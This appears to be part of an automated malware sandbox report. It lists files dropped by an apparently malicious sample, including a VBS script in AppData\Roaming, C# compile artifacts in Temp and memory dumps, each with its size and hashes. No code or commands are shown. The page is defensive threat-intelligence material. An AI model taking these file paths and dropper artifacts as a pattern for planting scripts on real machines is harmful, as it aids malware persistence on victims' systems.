501485025d253ee9efabba92661c24a4c7ada5bd651236eb45b23eff663f83b8c50f672dc6057b6a17ce08ff946855a5045053a6584b9266190571cdec88e151

Download Submit
C:\Users\Admin\AppData\Local\Temp\2fdziwdk.pdb

Filesize
7KB

MD5
32468b52c1563fcf644fff14ae2efad4

SHA1
abadb2528f12d221d31994bf3e4ea00818beafe1

SHA256
2f9ddb5b019b3b941dfba6adf17e0f4a36878b4caadcd92d52f33154fbfab3c9

SHA512
2e0c48eb1ae4754e3c63001fa1f3359077d6679dc6ecb5ccc8f4d8ef899ed25df71884be47c41d4389698fc7c2ce9c8521aca20986a15bd6a0592c675442c19d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab43A8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9187.tmp

Filesize
1KB

MD5
5269d3aa9f1b37655c6cb780a28d9a7c

SHA1
d3d8aefe525a82207e6ce0a9c743ef478d1d339c

SHA256
395f3abbce57540808190a6666a457e8ce3aa17fe07aa00b4103f24ae481eead

SHA512
6d99a4edac09a5e2984829154a0d71ed19fb76a81fc964531a7f10c41cbb8bda692709d3db2b4646772f7d65f0e0c09a6553b660c6665d48812e479907b3c6b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar43F9.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
b7d2b9fb2d84c768ff09bb764e15ba9f

SHA1
09536b1ea7d2e41d7d7683f1c347d0359ddb18a8

SHA256
436ff7093cf114b1c978dc37cfb247b65d353fc937a3bae57aaec1d035da038c

SHA512
30ead91f972b7ef44cbdddd2747c3020c24e6ac2151ae1096bea78d73279601821afa532821f38392e6463e23c15ea93be1eef6380d7ed154ed2486e17ab1201

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingswithgreatmagicalthingswithhe.vbs

Filesize
138KB

MD5
3a172f4d749a3cf2a42e0b7df638c8d3

SHA1
071d3b7db5a649ec3252af5b5a21ed047e71c785

SHA256
fe03066a9d3659d5f1e5941c7a73646780d55d15a57a9dde5901f469db2ead72

SHA512
30cc1c96d8cae17800f33f63d7ef8965536051ee7ec683b45e5c62079bf9487785ccc9b8ae8ab073f25f9059f1bbf84f73f8c8ff68c807c0e7007d597dced0d7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2fdziwdk.0.cs

Filesize
480B

MD5
02801ca1be5cf5616a9f398c85c263db

SHA1
e9000f0b5cd0dceb296fb59f9ed2c85717666377

SHA256
6d63144887d63ca3c8794b18c2e2283a7f5e6fdc5355fb24c0c3e7d11a172586

SHA512
4a27658c15203dd2122759a70db7f2917eb7a8899f9590f80a01b95d55a0631d0fce21d1ca6c9ec4111aabb7d9bdb9396f6483e42bb10850e9a9305d21616902

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2fdziwdk.cmdline

Filesize
309B

MD5
ac6d9454762aa75de07f71756b3ff4cc

SHA1
83709400685973f9c5d61ef6372b530ee61a8886

SHA256
1d452a612245d3168eaa7857283968b9b898c36a7612a0f13c58cf4fc7bae726

SHA512
003f54c00c31d893573a2c6f26bb9ef608e728ae982ec8b6bdca2cad9aaa67f8831b06c2af8e3ac185c832eafdbf4c29471322c0d7325fb0d7a9ac74a214fb80

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9186.tmp

Filesize
652B

MD5
0e5aeb497f889e3ef4dfb141f2019c7e

SHA1
92ee5b492cb697aa7b51f62fdbd0e618c73e22f2

SHA256
d88e7152479a265988f39c506b9dbbac7198ed4b5d3868ebc6e3be8f0cc52f55

SHA512
f092a6c414e377aef212d9aceb027977de1632c6b0e96c701249d7cb8e3aedd9594caa0886a2c9337ec5ee375bfbe54b8fa4f3b9469ecd07fe247afaa01345a7

Download Submit
memory/392-149-0x0000000002F40000-0x0000000002F42000-memory.dmp

Filesize
8KB

Download
memory/392-1-0x000000007261D000-0x0000000072628000-memory.dmp

Filesize
44KB

Download
memory/392-123-0x000000007261D000-0x0000000072628000-memory.dmp

Filesize
44KB

Download
memory/392-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2424-148-0x0000000002520000-0x0000000002522000-memory.dmp

Filesize
8KB

Download